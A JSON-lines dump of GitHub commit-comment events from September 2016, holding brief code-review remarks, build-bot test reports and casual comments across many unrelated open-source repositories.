{"id":"4613061688","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19159952,"position":5,"line":7,"path":"test/api/v3/integration/tasks/groups/tags/DELETE-group_tasks_taskId_tags_tagId.test.js","commit_id":"7b1ae68ad5963cdf53bb96c8624b781f3fe34294","created_at":"2016-09-24T19:38:24Z","updated_at":"2016-09-24T19:38:24Z","body":"Can we put a comment in both these pended tests to describe why they are pended?"}},"created_at":"2016-09-24T19:38:24Z"}
{"id":"4613065002","type":"CommitCommentEvent","actor":{"login":"kaankeh"},"repo":{"name":"nusje2000/Quizturbed.io"},"payload":{"comment":{"id":19159974,"position":null,"line":null,"path":null,"commit_id":"0eeaec08e8a2663b11bbb3577a6c337fbeddc393","created_at":"2016-09-24T19:41:02Z","updated_at":"2016-09-24T19:41:02Z","body":"Dit is echt een goede commit, trots op je!"}},"created_at":"2016-09-24T19:41:02Z"}
{"id":"4613065370","type":"CommitCommentEvent","actor":{"login":"kaankeh"},"repo":{"name":"nusje2000/Quizturbed.io"},"payload":{"comment":{"id":19159975,"position":null,"line":null,"path":null,"commit_id":"39a7c4c05d0f43c55051320b6dc337afae96d20f","created_at":"2016-09-24T19:41:22Z","updated_at":"2016-09-24T19:41:22Z","body":"Deze zou ik \"Minor text fixes\" genoemd hebben."}},"created_at":"2016-09-24T19:41:22Z"}
{"id":"4613066991","type":"CommitCommentEvent","actor":{"login":"stevan"},"repo":{"name":"stevan/p5-App-Critique"},"payload":{"comment":{"id":19159986,"position":null,"line":null,"path":null,"commit_id":"92748f23288174eece0bcad0058315c39f67ac94","created_at":"2016-09-24T19:42:38Z","updated_at":"2016-09-24T19:42:38Z","body":"haha, no worries, i happens"}},"created_at":"2016-09-24T19:42:38Z"}
{"id":"4613068096","type":"CommitCommentEvent","actor":{"login":"Necktrox"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19159991,"position":null,"line":null,"path":null,"commit_id":"71dd9571753696ba690cd5a80b34edb0cff69651","created_at":"2016-09-24T19:43:28Z","updated_at":"2016-09-24T19:43:28Z","body":"This commit introduces a new exception in `~CClientGame` in `CElementDeleter::DoDeleteAll`. An element in the `m_List` **std::list** has been deleted beforehand after supposely deleting a **CClientGUIWebBrowser** and the dead pointer is still in the list, throwing an exception when **ClientDeleter** tries to release the memory on the dead pointer."}},"created_at":"2016-09-24T19:43:28Z"}
{"id":"4613069516","type":"CommitCommentEvent","actor":{"login":"romao10"},"repo":{"name":"WhatCD/Gazelle"},"payload":{"comment":{"id":19159999,"position":5,"line":6,"path":"README.md","commit_id":"14d8d133f5f1910082259f459f131196e3ad08a8","created_at":"2016-09-24T19:44:30Z","updated_at":"2016-09-24T19:44:30Z","body":"ola eu romao gostava de poder ser um membro obrigado "}},"created_at":"2016-09-24T19:44:30Z"}
{"id":"4613071272","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19160007,"position":null,"line":null,"path":null,"commit_id":"35a865c0ed7a7c097ee555588e66630c76892064","created_at":"2016-09-24T19:45:42Z","updated_at":"2016-09-24T19:45:42Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2296 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.99%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T19:45:42Z"}
{"id":"4613073227","type":"CommitCommentEvent","actor":{"login":"Royal-Jelly"},"repo":{"name":"sayterdarkwynd/FrackinUniverse"},"payload":{"comment":{"id":19160014,"position":null,"line":null,"path":null,"commit_id":"2f485e461f6a3565689644bcbeaabe5c81e2317a","created_at":"2016-09-24T19:47:03Z","updated_at":"2016-09-24T19:47:03Z","body":"where are we dropping it? we should drop it on the newly revived ISE-4"}},"created_at":"2016-09-24T19:47:03Z"}
{"id":"4613075887","type":"CommitCommentEvent","actor":{"login":"lavigor"},"repo":{"name":"rxu/Olympusrupack"},"payload":{"comment":{"id":19160024,"position":43,"line":443,"path":"language/ru/install.php","commit_id":"83a0afd878e1056e5322c50469856b808f7c38ce","created_at":"2016-09-24T19:49:04Z","updated_at":"2016-09-24T19:49:04Z","body":"М.б. версия файлов?\r\nЕсли рассматривать их как совокупность.\r\nВсё равно проверяется только одна константа."}},"created_at":"2016-09-24T19:49:04Z"}
{"id":"4613078263","type":"CommitCommentEvent","actor":{"login":"rxu"},"repo":{"name":"rxu/Olympusrupack"},"payload":{"comment":{"id":19160033,"position":43,"line":443,"path":"language/ru/install.php","commit_id":"83a0afd878e1056e5322c50469856b808f7c38ce","created_at":"2016-09-24T19:50:42Z","updated_at":"2016-09-24T19:50:42Z","body":"Да, видимо так лучше."}},"created_at":"2016-09-24T19:50:42Z"}
{"id":"4613078859","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19160034,"position":null,"line":null,"path":null,"commit_id":"35a865c0ed7a7c097ee555588e66630c76892064","created_at":"2016-09-24T19:51:09Z","updated_at":"2016-09-24T19:51:09Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-24T19:51:09Z"}
{"id":"4613079302","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19160035,"position":21,"line":21,"path":"js/scripts.js","commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-24T19:51:24Z","updated_at":"2016-09-24T19:51:24Z","body":"```\r\nfunction nazwa(a, b) {\r\n  if (a==0 || b == 0) {\r\n    return 'złe dane wejściowe'\r\n  }\r\n\r\n  return a*b;\r\n}\r\n```"}},"created_at":"2016-09-24T19:51:24Z"}
{"id":"4613082444","type":"CommitCommentEvent","actor":{"login":"kiotoze"},"repo":{"name":"kiotoze/MaterialDrawer"},"payload":{"comment":{"id":19160048,"position":null,"line":null,"path":null,"commit_id":"464f7a63d65b34a395ebcddfaf3d42ea79badf8e","created_at":"2016-09-24T19:53:40Z","updated_at":"2016-09-24T19:53:40Z","body":" Added posibility to set rotation angle\r\n\r\nfor example when we put param withRotationAngle(90) it will allow arrow rotation from state > to V and then back from V to >"}},"created_at":"2016-09-24T19:53:40Z"}
{"id":"4613083136","type":"CommitCommentEvent","actor":{"login":"0xNacho"},"repo":{"name":"proteus-h2020/proteus-charts"},"payload":{"comment":{"id":19160050,"position":5,"line":35,"path":"src/svg/components/xAxis.js","commit_id":"41730d567756fd77152b4eb5244831ac01509202","created_at":"2016-09-24T19:54:13Z","updated_at":"2016-09-24T19:54:13Z","body":"Why this change? (I guess this is an error, but just in case...) @jorgeyp "}},"created_at":"2016-09-24T19:54:13Z"}
{"id":"4613084063","type":"CommitCommentEvent","actor":{"login":"ivanterterov"},"repo":{"name":"ivanterterov/hello-world"},"payload":{"comment":{"id":19160056,"position":2,"line":2,"path":"README.md","commit_id":"e671628c3dc67211fd2c2bd51cab3664baaab15e","created_at":"2016-09-24T19:54:53Z","updated_at":"2016-09-24T19:54:53Z","body":"Here I want to say some acknowledgment to my friends, You guys are awesome!"}},"created_at":"2016-09-24T19:54:53Z"}
{"id":"4613084809","type":"CommitCommentEvent","actor":{"login":"RJP43"},"repo":{"name":"jonhoranic/theGraveyard"},"payload":{"comment":{"id":19160061,"position":null,"line":null,"path":null,"commit_id":"4b94ef5ff22978b6045c1d97317d6daf89028786","created_at":"2016-09-24T19:55:25Z","updated_at":"2016-09-24T19:55:25Z","body":"@ebeshero I don't know if you saw this, but it is hilarious! Love it @JaredKramer40."}},"created_at":"2016-09-24T19:55:25Z"}
{"id":"4613086369","type":"CommitCommentEvent","actor":{"login":"Scottmitch"},"repo":{"name":"jasobrown/cassandra"},"payload":{"comment":{"id":19160064,"position":23,"line":47,"path":"test/unit/org/apache/cassandra/net/async/LegacyClientHandlerTest.java","commit_id":"7bc4bf8c862c1dd0f924bd6a859a670486776c14","created_at":"2016-09-24T19:56:35Z","updated_at":"2016-09-24T19:56:35Z","body":"Do you want to release the buffers in the queue before you clear?\r\n\r\n```java\r\nByteBuf buf = null;\r\nwhile ((buf = queue.poll()) != null) {\r\n  buf.release();\r\n}\r\n```"}},"created_at":"2016-09-24T19:56:35Z"}
{"id":"4613086543","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19160065,"position":null,"line":null,"path":null,"commit_id":"966b47e0dd8bc763ab11f943c11eda35b16b3d12","created_at":"2016-09-24T19:56:45Z","updated_at":"2016-09-24T19:56:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BWqYqQ9n&#x2F;60-contact-rewrite-js-using-oop\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Contact - rewrite js using OOP</a>"}},"created_at":"2016-09-24T19:56:45Z"}
{"id":"4613089175","type":"CommitCommentEvent","actor":{"login":"takkaria"},"repo":{"name":"t4nk074/angband"},"payload":{"comment":{"id":19160074,"position":null,"line":null,"path":null,"commit_id":"6b82843ebd982ba96c0c9c39f1576e4ddb3180e4","created_at":"2016-09-24T19:58:46Z","updated_at":"2016-09-24T19:58:46Z","body":"Shouldn't this be wcslen, not sizeof?"}},"created_at":"2016-09-24T19:58:46Z"}
{"id":"4613089198","type":"CommitCommentEvent","actor":{"login":"basheerauto"},"repo":{"name":"basheerauto/DigitalPoc"},"payload":{"comment":{"id":19160075,"position":null,"line":null,"path":null,"commit_id":"74462667a0715782399274b5cd7d8c8e851f0d78","created_at":"2016-09-24T19:58:48Z","updated_at":"2016-09-24T19:58:48Z","body":"first commit"}},"created_at":"2016-09-24T19:58:48Z"}
{"id":"4613090513","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19160079,"position":null,"line":null,"path":null,"commit_id":"cbf8daa595c741a6f77c62249b868ddfec8feef9","created_at":"2016-09-24T19:59:49Z","updated_at":"2016-09-24T19:59:49Z","body":"Good update!"}},"created_at":"2016-09-24T19:59:49Z"}
{"id":"4611750212","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155588,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:00:31Z","updated_at":"2016-09-24T02:00:31Z","body":"Yeah this is very likely to be the reason why LaTeX failed to compile."}},"created_at":"2016-09-24T02:00:31Z"}
{"id":"4611752351","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155600,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T02:01:56Z","updated_at":"2016-09-24T02:01:56Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.55%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-24T02:01:56Z"}
{"id":"4611753796","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155604,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T02:02:54Z","updated_at":"2016-09-24T02:02:54Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-24T02:02:54Z"}
{"id":"4611754980","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155606,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T02:03:50Z","updated_at":"2016-09-24T02:03:50Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T02:03:50Z"}
{"id":"4611755848","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19155612,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T02:04:31Z","updated_at":"2016-09-24T02:04:31Z","body":"anyway the reason I changed it was mainly the distraction of setting something on demand. you are right though that relatively speaking, it doesn't matter as most things involved here are very inefficient anyway, so one more doesn't likely make any difference."}},"created_at":"2016-09-24T02:04:31Z"}
{"id":"4611757509","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19155620,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T02:05:42Z","updated_at":"2016-09-24T02:05:42Z","body":"@sethp-jive ps why do we early return instead of throw. I meant to ask you? This could end up as a very subtle config bug."}},"created_at":"2016-09-24T02:05:42Z"}
{"id":"4611758644","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19155626,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T02:06:33Z","updated_at":"2016-09-24T02:06:33Z","body":"seems like we should be throwing an illegalstateexception unless we expect public write access on a domain..."}},"created_at":"2016-09-24T02:06:33Z"}
{"id":"4611761642","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/Tutorial-Project"},"payload":{"comment":{"id":19155637,"position":null,"line":null,"path":null,"commit_id":"7860fba6173ed8b42a97645b2359489badb4a08c","created_at":"2016-09-24T02:08:44Z","updated_at":"2016-09-24T02:08:44Z","body":"You didn't even make your own file\r\nNext time, make sure to commit only the files you need to."}},"created_at":"2016-09-24T02:08:44Z"}
{"id":"4611762285","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155644,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:09:14Z","updated_at":"2016-09-24T02:09:14Z","body":"Yep, I'm trying to get it to compile locally to see if I can diagnose the problem-- I don't think it's a travis problem anymore at this point. Thanks again so much for your help!"}},"created_at":"2016-09-24T02:09:14Z"}
{"id":"4611763286","type":"CommitCommentEvent","actor":{"login":"cransom"},"repo":{"name":"cransom/nixpkgs"},"payload":{"comment":{"id":19155649,"position":null,"line":null,"path":null,"commit_id":"fe163f9c2fd4d7d59964a8c4d745b435b3023d27","created_at":"2016-09-24T02:10:04Z","updated_at":"2016-09-24T02:10:04Z","body":"@mbbx6spp @polynomial do you have thoughts on this change?"}},"created_at":"2016-09-24T02:10:04Z"}
{"id":"4611763672","type":"CommitCommentEvent","actor":{"login":"ranjiexu"},"repo":{"name":"ranjiexu/ranjiexu.github.com"},"payload":{"comment":{"id":19155650,"position":null,"line":null,"path":null,"commit_id":"a6bc796c05021ae5e0dab5238da86e201a0bd9d6","created_at":"2016-09-24T02:10:19Z","updated_at":"2016-09-24T02:10:19Z","body":"Bravo!"}},"created_at":"2016-09-24T02:10:19Z"}
{"id":"4611766311","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/Tutorial-Project"},"payload":{"comment":{"id":19155659,"position":null,"line":null,"path":null,"commit_id":"7860fba6173ed8b42a97645b2359489badb4a08c","created_at":"2016-09-24T02:12:27Z","updated_at":"2016-09-24T02:12:27Z","body":"wtf this is a merge commit wtf??????????\r\n"}},"created_at":"2016-09-24T02:12:27Z"}
{"id":"4611766903","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19155662,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-24T02:12:59Z","updated_at":"2016-09-24T02:12:59Z","body":"This force bit is internal private code.... and does not stop the use of refresh_db. More than happy to add the doco, so people can benefit from the speed improvement.   The default is 0 which is disabled.\r\nYum for example has the same sort of setting which is disabled by default.  But yum can check in under 10 secs if its out of date with a http check, windows refresh_db takes 20+ seconds and this will just grow in time as windows package management with salt gets more popular and more sls files are added. \r\n\r\nAnd then you need to multiple that by the number of severs which will target the salt master to pull down the sls files. The following all default to refresh=True latest_version(), upgrade_available() list_upgrades() upgrade().\r\n\r\nIt does not worry if force changes its name, it existed in the original PR  this code was added in this PR.   Maybe it should be called refresh_test or freshen or regenerate.  Any thoughts.\r\n\r\nI need to add doco for winrepo_cache_expire_max winrepo_cache_expire_min into the PR  into the config doco.  I will add something to the top of  win_pkg.py doc string as well.    I will do it over the weekend as I know you guys need this done."}},"created_at":"2016-09-24T02:12:59Z"}
{"id":"4611767286","type":"CommitCommentEvent","actor":{"login":"huangkerui"},"repo":{"name":"huangkerui/react-basics"},"payload":{"comment":{"id":19155663,"position":null,"line":null,"path":null,"commit_id":"7ccf1557cf922d33057a896b2349d0deb8881e81","created_at":"2016-09-24T02:13:15Z","updated_at":"2016-09-24T02:13:15Z","body":"1. Run `npm init` command in the directory and input the information as needed."}},"created_at":"2016-09-24T02:13:15Z"}
{"id":"4611767381","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":19155664,"position":null,"line":null,"path":null,"commit_id":"c3fe48fe6990511070bf364dc963515ffd9afff6","created_at":"2016-09-24T02:13:21Z","updated_at":"2016-09-24T02:13:21Z","body":"Fixes #20"}},"created_at":"2016-09-24T02:13:21Z"}
{"id":"4611767910","type":"CommitCommentEvent","actor":{"login":"pichichi21"},"repo":{"name":"pichichi21/PracticeDataStructsAndAlgorithms"},"payload":{"comment":{"id":19155668,"position":11,"line":11,"path":"binarySearch","commit_id":"be94466ec69ef9df5f09382484a066fbfa4029f0","created_at":"2016-09-24T02:13:46Z","updated_at":"2016-09-24T02:13:46Z","body":"this is a comment"}},"created_at":"2016-09-24T02:13:46Z"}
{"id":"4611769129","type":"CommitCommentEvent","actor":{"login":"pichichi21"},"repo":{"name":"pichichi21/PracticeDataStructsAndAlgorithms"},"payload":{"comment":{"id":19155675,"position":20,"line":20,"path":"binarySearch","commit_id":"be94466ec69ef9df5f09382484a066fbfa4029f0","created_at":"2016-09-24T02:14:45Z","updated_at":"2016-09-24T02:14:45Z","body":"nljkhljh"}},"created_at":"2016-09-24T02:14:45Z"}
{"id":"4611769333","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19155677,"position":4,"line":61,"path":"source/gameengine/Converter/KX_BlenderSceneConverter.cpp","commit_id":"1f9b5688bfc877452dc7fe55482d5e864d2dc4e8","created_at":"2016-09-24T02:14:52Z","updated_at":"2016-09-24T02:14:52Z","body":"Hi, windows doesn't like that (compil errors). I think there are conflicts on what is defined in Common.h and windows own modules..."}},"created_at":"2016-09-24T02:14:52Z"}
{"id":"4611769472","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19155680,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-24T02:14:57Z","updated_at":"2016-09-24T02:14:57Z","body":"Maybe refresh_aim"}},"created_at":"2016-09-24T02:14:57Z"}
{"id":"4611770078","type":"CommitCommentEvent","actor":{"login":"huangkerui"},"repo":{"name":"huangkerui/react-basics"},"payload":{"comment":{"id":19155683,"position":null,"line":null,"path":null,"commit_id":"939dc492278a3bbb6aa1324e9536c351bd2befd1","created_at":"2016-09-24T02:15:25Z","updated_at":"2016-09-24T02:15:25Z","body":"Install the following necessary dependencies\r\n1. webpack: `npm install --save webpack`, `npm install -g webpack`\r\n2. babel: `npm install --save babel-plugin-add-module-exports babel-plugin-react-html-attrs babel-plugin-transform-class-properties babel-plugin-transform-decorators babel-preset-es2015 babel-preset-react babel-preset-stage-0`\r\n3. react: `npm install --save react react-dom`\r\n\r\n"}},"created_at":"2016-09-24T02:15:25Z"}
{"id":"4611770333","type":"CommitCommentEvent","actor":{"login":"themirror178"},"repo":{"name":"laravel/lumen"},"payload":{"comment":{"id":19155684,"position":null,"line":null,"path":null,"commit_id":"61a3f7921688cf7eb1a35cf054bbb69e227aa88e","created_at":"2016-09-24T02:15:37Z","updated_at":"2016-09-24T02:15:37Z","body":"Looks like the documentation (5.3) hasn't been updated to reflect this. "}},"created_at":"2016-09-24T02:15:37Z"}
{"id":"4611771412","type":"CommitCommentEvent","actor":{"login":"montyvesselinov"},"repo":{"name":"madsjulia/Mads.jl"},"payload":{"comment":{"id":19155692,"position":4,"line":25,"path":"REQUIRE","commit_id":"db827c14bbb8b88499c01fd13624bdc848837ad2","created_at":"2016-09-24T02:16:33Z","updated_at":"2016-09-24T02:16:33Z","body":"This is great. Thank you very much!\nOn Fri, Sep 23, 2016 at 7:41 PM Tony Kelman <notifications@github.com>\nwrote:\n\n> see JuliaStats/DataArrays.jl#168\n> <https://github.com/JuliaStats/DataArrays.jl/issues/168> - ambiguity\n> warnings don't happen at load time any more on julia 0.5, but trying to\n> call an ambiguous method is now a runtime error\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/madsjulia/Mads.jl/commit/db827c14bbb8b88499c01fd13624bdc848837ad2#commitcomment-19155493>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFXxeOEc8RAziD_B3Ec_vEvHWls5S3LKks5qtH_MgaJpZM4KFRNS>\n> .\n>\n-- \n-monty\n"}},"created_at":"2016-09-24T02:16:33Z"}
{"id":"4611772080","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19155694,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T02:17:07Z","updated_at":"2016-09-24T02:17:07Z","body":"Yes, it seems that this is write. When I take out that figure caption, it fails later, at another figure with a caption. "}},"created_at":"2016-09-24T02:17:07Z"}
{"id":"4611773509","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19155704,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T02:18:17Z","updated_at":"2016-09-24T02:18:17Z","body":"so anyway, my complaint about this class in general, you are right. will rever."}},"created_at":"2016-09-24T02:18:17Z"}
{"id":"4611773861","type":"CommitCommentEvent","actor":{"login":"boycetrus"},"repo":{"name":"boycetrus/sierra-webpac-bootstrap-skin"},"payload":{"comment":{"id":19155705,"position":null,"line":null,"path":null,"commit_id":"62bb109ddcf14794e858e9dddf25153943a1ee77","created_at":"2016-09-24T02:18:33Z","updated_at":"2016-09-24T02:18:33Z","body":"Fixes Issue #3"}},"created_at":"2016-09-24T02:18:33Z"}
{"id":"4611774358","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19155706,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T02:18:56Z","updated_at":"2016-09-24T02:18:56Z","body":"Looked and found that there is actually an anonymous credentials. I'm going to make this throw (rather not swallow) when I change the other thing."}},"created_at":"2016-09-24T02:18:56Z"}
{"id":"4611775717","type":"CommitCommentEvent","actor":{"login":"RecluseGeorge"},"repo":{"name":"RecluseGeorge/Py-Data-Structures"},"payload":{"comment":{"id":19155712,"position":86,"line":86,"path":"Binary Search Tree(Complete).py","commit_id":"67d57f34c7d26701784685de3e13820aa5fd4ec9","created_at":"2016-09-24T02:20:04Z","updated_at":"2016-09-24T02:20:04Z","body":"Insert all the elements you want to add in a list and then using list interation,use the defined insert function."}},"created_at":"2016-09-24T02:20:04Z"}
{"id":"4611776231","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155715,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-24T02:20:26Z","updated_at":"2016-09-24T02:20:26Z","body":"2782485_HybridModel (sanghlee-lbnl) - i386-Windows-7-VisualStudio-12: Tests Failed (1667 of 2242 tests passed, 5 test warnings)\n\n * 27 tests had: AUD diffs.\n * 27 tests had: EIO diffs.\n * 27 tests had: ESO small diffs.\n * 22 tests had: Table big diffs.\n * 9 tests had: ERR diffs.\n * 1 test had: RDD diffs.\n * 12 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-74.35%25-red.svg)</a> \n"}},"created_at":"2016-09-24T02:20:26Z"}
{"id":"4611781658","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19155735,"position":null,"line":null,"path":null,"commit_id":"10fdf160d694b10cfe74f6a6c2b1c8c7b0326f20","created_at":"2016-09-24T02:24:16Z","updated_at":"2016-09-24T02:24:16Z","body":"@manzarek123 I'm sorry, wha, what? There is plenty of commits going by recently. "}},"created_at":"2016-09-24T02:24:16Z"}
